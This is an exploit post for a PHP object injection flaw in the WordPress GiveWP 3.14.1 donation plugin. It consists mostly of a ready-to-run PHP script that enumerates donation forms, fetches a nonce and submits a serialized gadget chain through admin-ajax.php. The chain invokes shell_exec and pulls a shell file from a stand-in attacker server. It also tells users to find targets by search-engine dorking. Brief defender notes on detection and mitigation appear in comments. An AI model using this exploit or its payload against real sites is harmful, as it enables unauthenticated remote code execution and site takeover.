| # Title : WordPress GiveWP Donation Fundraising Platform 3.14.1 php code injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits) |
| # Vendor : https://givewp.com/ |
=============================================================================================================================================
POC :
[+] Dorking in Google or other search engines.
[+] The following PHP code uploads a shell file from an external link.
[+] Line 78: set your file link.
[+] Line 127: set your target.
[+] Save the code as poc.php.
[+] Usage : cmd = php poc.php .
[+] PayLoad :
<?php
/**
 * Proof-of-concept client for the GiveWP 3.14.1 issue described in the
 * header. It drives three admin-ajax.php actions in sequence:
 * give_form_search (list forms), give_donation_form_nonce (fetch a form
 * nonce) and give_process_donation (submit a donation whose `give_title`
 * field carries a serialized PHP object graph, see sendExploitRequest()).
 *
 * Defender notes: every request is an unauthenticated POST to
 * /wp-admin/admin-ajax.php; a `give_title` value beginning with `O:`
 * (a serialized object) is the distinguishing marker for detection.
 * Mitigation is to move off the affected plugin release and to keep
 * donation-field input from reaching unserialize().
 */
class GiveWPExploit {
// Base URL of the WordPress site (scheme + host, no trailing slash).
private $targetUrl;
// Raw header lines sent with every request; see sendRequest() for how they are joined.
private $headers;
/**
 * @param string $targetUrl Base URL of the target site, e.g. 'http://127.0.0.1'.
 */
public function __construct($targetUrl) {
$this->targetUrl = $targetUrl;
$this->headers = array(
'Content-Type: application/x-www-form-urlencoded'
);
}
/**
 * Lists the site's donation forms via the give_form_search AJAX action.
 *
 * Prints a status line either way.
 *
 * @return array|false Decoded JSON form list on success, false on transport
 *                     failure, non-200 status, or an empty/undecodable body.
 */
public function check() {
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array('action' => 'give_form_search'));
if (!$response || $response['http_code'] != 200) {
echo "Failed to retrieve form list. ";
return false;
}
$forms = json_decode($response['body'], true);
// empty() also covers json_decode() returning null on invalid JSON.
if (empty($forms)) {
echo "No forms found. ";
return false;
}
// Assumes each entry is an array with an 'id' key — TODO confirm against the plugin's response shape.
echo "Successfully retrieved form list. Available Form IDs: " . implode(', ', array_column($forms, 'id')) . " ";
return $forms;
}
/**
 * Full run: enumerate forms, pick one at random, fetch its nonce, then
 * submit the crafted donation. Returns early (with a message) when any
 * step fails.
 *
 * @return void
 */
public function exploit() {
$forms = $this->check();
if (!$forms) {
return;
}
// array_rand() returns a key, so this picks one form entry at random.
$selectedForm = $forms[array_rand($forms)];
$validForm = $this->retrieveAndAnalyzeForm($selectedForm['id']);
if (!$validForm) {
echo "Failed to retrieve a valid form for exploitation. ";
return;
}
echo "Using Form ID: " . $validForm['give_form_id'] . " for exploitation. ";
$this->sendExploitRequest($validForm);
}
/**
 * Fetches the per-form nonce via give_donation_form_nonce and bundles it
 * with fixed price/amount defaults.
 *
 * @param int|string $formId Form ID taken from check().
 * @return array|false Keys give_form_id, give_form_hash, give_price_id,
 *                     give_amount; false on transport failure, non-200
 *                     status, or a missing 'data' field.
 */
private function retrieveAndAnalyzeForm($formId) {
$response = $this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', array(
'action' => 'give_donation_form_nonce',
'give_form_id' => $formId
));
if (!$response || $response['http_code'] != 200) {
return false;
}
$formData = json_decode($response['body'], true);
$giveFormId = $formId;
// 'data' is taken as the nonce; if the body is not JSON this is a null
// read on a non-array and the check below returns false.
$giveFormHash = $formData['data'];
$givePriceId = '0'; // Default price ID
$giveAmount = '$10.00'; // Default amount; format presumably matches what the form expects — verify
if (!$giveFormHash) {
return false;
}
return array(
'give_form_id' => $giveFormId,
'give_form_hash' => $giveFormHash,
'give_price_id' => $givePriceId,
'give_amount' => $giveAmount
);
}
/**
 * Submits the donation whose give_title field is the serialized object
 * graph. The response is not inspected; the method reports nothing.
 *
 * @param array $validForm Array returned by retrieveAndAnalyzeForm().
 * @return void
 */
private function sendExploitRequest($validForm) {
// URL of the malicious file to be fetched
$remoteFileUrl = 'http://attacker-server.com/malicious-file.php';
// Payload that uses file_get_contents to fetch the remote file
// This is a PHP serialize() string: nested objects whose property names
// are wrapped in "\0*\0" (protected visibility markers). The remote URL is
// spliced in as the innermost 'address1' string; serialized string
// lengths are byte counts, so strlen() (not mb_strlen()) is the right
// length here.
$payload = sprintf(
'O:19:"Stripe\\StripeObject":1:{s:10:"\0*\0_values";a:1:{s:3:"foo";O:62:"Give\\PaymentGateways\\DataTransferObjects\\GiveInsertPaymentData":1:{s:8:"userInfo";a:1:{s:7:"address";O:4:"Give":1:{s:12:"\0*\0container";O:33:"Give\\Vendors\\Faker\\ValidGenerator":3:{s:10:"shell_exec";s:12:"\0*\0generator";O:34:"Give\\Onboarding\\SettingsRepository":1:{s:11:"\0*\0settings";a:1:{s:8:"address1";s:%d:"%s";}}}}}}}}',
strlen($remoteFileUrl),
$remoteFileUrl
);
// Standard GiveWP donation form fields; only give_title carries the payload.
$data = array(
'give-form-id' => $validForm['give_form_id'],
'give-form-hash' => $validForm['give_form_hash'],
'give-price-id' => $validForm['give_price_id'],
'give-amount' => $validForm['give_amount'],
'give_first' => 'Test',
'give_last' => 'User',
'give_email' => 'test@example.com',
'give_title' => $payload,
'give-gateway' => 'offline',
'action' => 'give_process_donation'
);
$this->sendRequest('POST', $this->targetUrl . '/wp-admin/admin-ajax.php', $data);
}
/**
 * Minimal HTTP client built on the stream wrapper.
 *
 * Note: without 'ignore_errors' in the context, file_get_contents() returns
 * false for non-2xx responses, so callers see those as transport failures.
 * Headers are joined with a single space, which only works because exactly
 * one header is configured; multiple headers would need "\r\n".
 *
 * @param string $method HTTP method, e.g. 'POST'.
 * @param string $url    Absolute URL.
 * @param array  $data   Form fields, encoded with http_build_query().
 * @return array|false ['http_code' => int, 'body' => string] or false on failure.
 */
private function sendRequest($method, $url, $data) {
$options = array(
'http' => array(
'method' => $method,
'header' => implode(" ", $this->headers),
'content' => http_build_query($data)
)
);
$context = stream_context_create($options);
// $http_response_header is populated by the http wrapper after this call.
$result = file_get_contents($url, false, $context);
if ($result === false) {
return false;
}
return array(
'http_code' => (int) substr($http_response_header[0], 9, 3), // Get the HTTP code: status line "HTTP/x.y NNN ..." has the code at offset 9
'body' => $result
);
}
}
// Usage
// Entry point: the constructor argument is the base URL of the site under test.
$exploit = new GiveWPExploit('http://127.0.0.1');
$exploit->exploit();
?>
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================